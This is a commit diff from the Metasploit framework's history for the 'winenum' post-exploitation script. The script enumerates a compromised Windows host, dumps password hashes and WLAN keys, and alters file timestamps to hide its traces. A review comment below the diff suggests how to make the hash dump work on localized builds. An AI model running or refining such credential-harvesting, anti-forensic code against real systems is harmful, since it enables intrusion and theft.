Updated winenum frmo Carlos Perez

git-svn-id: file:///home/svn/framework3/trunk@6574 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-05-22 02:33:33 +00:00
parent 99afc981d2
commit 7ef884eba7
1 changed files with 28 additions and 8 deletions


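--- a/UNKNOWN_PATH
+++ b/UNKNOWN_PATH
@@ -48,11 +48,14 @@ commands = [
 'net view /domain',
 'netsh firewall show config',
 'tasklist /svc',
-'tasklist /m'
+'tasklist /m',
+'gpresult /SCOPE COMPUTER /Z',
+'gpresult /SCOPE USER /Z'
 ]
 # Windows 2008 Commands
 win2k8cmd = [
-'oclist',
+'servermanagercmd.exe -q',
+'cscript /nologo winrm get winrm/config',
 ]
 # Commands wich MACE will be changed
 cmdstomp = [
@@ -66,6 +69,7 @@ cmdstomp = [
 'makecab.exe',
 'tasklist.exe',
 'wbem\\wmic.exe',
+'gpresult.exe'
 ]
 # WMIC Commands that will be executed on the Target
 wmic = [
@@ -97,6 +101,8 @@ vstwlancmd = [
 nonwin2kcmd = [
 'netsh firewall show config',
 'tasklist /svc',
+'gpresult /SCOPE COMPUTER /Z',
+'gpresult /SCOPE USER /Z',
 'prnport -l',
 'prnmngr -g',
 'tasklist.exe',
@@ -106,6 +112,7 @@ nonwin2kcmd = [
 # Executables not pressent in Windows 2000
 nowin2kexe = [
 'netsh.exe',
+'gpresult.exe',
 'tasklist.exe',
 'wbem\\wmic.exe',
 ]
@@ -174,6 +181,7 @@ def list_exec(session,cmdlst)
 tmpout = ""
 cmdout = ""
 r=''
+session.response_timeout=120
 cmdlst.each do |cmd|
 begin
 print_status "\trunning command #{cmd}"
@@ -202,6 +210,7 @@ def wmicexec(session,wmiccmds= nil)
 windr = ''
 tmpout = ''
 windrtmp = ""
+session.response_timeout=120
 begin
 tmp = session.fs.file.expand_path("%TEMP%")
 wmicfl = tmp + "\\wmictmp.txt"
@@ -478,7 +487,6 @@ def dumpwlankeys(session,pathoflogs,filename)
 print_status("\tCompressing key into cab file for faster download")
 r = session.sys.process.execute("cmd.exe /c makecab #{windir}\\wlan#(unknown).reg #{windir}\\wlan#(unknown).cab", nil, {'Hidden' => 'true','Channelized' => true})
 while(d = r.channel.read)
-puts d
 garbage << d
 end
 r.channel.close
@@ -498,7 +506,6 @@ def dumpwlankeys(session,pathoflogs,filename)
 end
 #Deleting left over files
 print_status("\tDeleting left over files")
-puts "cmd.exe /c del #{windir}\\wlan*"
 #session.sys.process.execute("cmd.exe /c del #{windir}\\wlan*", nil, {'Hidden' => 'true'})
 end
@@ -612,24 +619,37 @@ if helpopt != 1
 filewrt(dest,wmicexec(session,wmic))
 filewrt(dest,findprogs(session))
 dumpwlankeys(session,logs,filenameinfo)
+filewrt(dest,gethash(session))
 elsif trgtos =~ /(Windows .NET)/
 filewrt(dest,list_exec(session,commands))
 filewrt(dest,wmicexec(session,wmic))
 filewrt(dest,findprogs(session))
+filewrt(dest,gethash(session))
 elsif trgtos =~ /(Windows 2008)/
-filewrt(dest,list_exec(session,commands))
-filewrt(dest,wmicexec(session,wmic))
-filewrt(dest,findprogs(session))
+filewrt(dest,list_exec(session,commands + win2k8cmd))
+#filewrt(dest,wmicexec(session,wmic))
+#filewrt(dest,findprogs(session))
+if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
+else
+filewrt(dest,gethash(session))
+end
 elsif trgtos =~ /(Windows Vista)/
 filewrt(dest,list_exec(session,commands + vstwlancmd))
 filewrt(dest,wmicexec(session,wmic))
 filewrt(dest,findprogs(session))
 dumpwlankeys(session,logs,filenameinfo)
+if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista if not System.")
+else
+filewrt(dest,gethash(session))
+end
 elsif trgtos =~ /(Windows 2000)/
 filewrt(dest,list_exec(session,commands - nonwin2kcmd))
+filewrt(dest,gethash(session))
 end
-filewrt(dest,gethash(session))
+#filewrt(dest,gethash(session))
 filewrt(dest,listtokens(session))
 if (rd != nil)
 regdump(session,logs,filenameinfo)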
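Review bot: The new SYSTEM check in the Windows 2008 branch, and its copy in the Windows Vista branch, compares `client.sys.config.getuid` against the hard-coded English literal `"NT AUTHORITY\\SYSTEM"`, so on a localized Windows build, where the account may be reported under a translated name, the check would presumably skip `gethash` even when the session really is SYSTEM; it also reads `client` while every other call in this block goes through `session`. For consistency use `if (session.sys.config.getuid != "NT AUTHORITY\\SYSTEM")` in both branches, and since the check is duplicated verbatim, add a comment above it such as `# NOTE: getuid returns a localized name; this literal only matches English builds`. Separately, `list_exec` and `wmicexec` now set `session.response_timeout=120` without saving or restoring the previous value, so the longer timeout persists for everything else run on that session afterward; capture the old value before the loop and restore it in an `ensure`. The `if helpopt != 1` block that this last hunk belongs to starts before the hunk.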